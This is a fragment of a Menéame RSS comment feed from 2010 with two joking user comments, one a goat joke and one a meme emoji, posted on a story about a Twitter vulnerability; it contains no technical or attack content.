		<title>#2 Nueva vulnerabilidad afecta a Twitter en estos momentos</title>
		<link>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c02#c-2</link>
		<pubDate>Sun, 26 Sep 2010 18:23:33 +0000</pubDate>
		<dc:creator>--132341--</dc:creator>
		<guid>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c02#c-2</guid>
		<description><![CDATA[<p>Mierda, demasiado tarde! Sabía que mi amor por las cabras sería mi perdición.</p><p>&#187;&nbsp;autor: <strong>--132341--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>7057646</meneame:comment_id>
		<meneame:link_id>1057401</meneame:link_id>
		<meneame:order>1</meneame:order>
		<meneame:user>--136437--</meneame:user>
		<meneame:votes>34</meneame:votes>
		<meneame:karma>314</meneame:karma>
		<meneame:url>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos</meneame:url>
		<title>#1 Nueva vulnerabilidad afecta a Twitter en estos momentos</title>
		<link>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c01#c-1</link>
		<pubDate>Sun, 26 Sep 2010 18:22:21 +0000</pubDate>
		<dc:creator>--136437--</dc:creator>
		<guid>https://www.meneame.net/story/nueva-vulnerabilidad-afecta-twitter-estos-momentos/c01#c-1</guid>
		<description><![CDATA[<p><img data-src="https://cdn.mnmstatic.net/v_149/img/menemojis/36/goatse.png" alt=":goatse:" title=":goatse:" width="18" height="18" src="https://cdn.mnmstatic.net/v_149/img/g.gif" class="emoji lazy" /></p><p>&#187;&nbsp;autor: <strong>--136437--</strong></p>]]></description>
	</item>

</channel>
</rss>
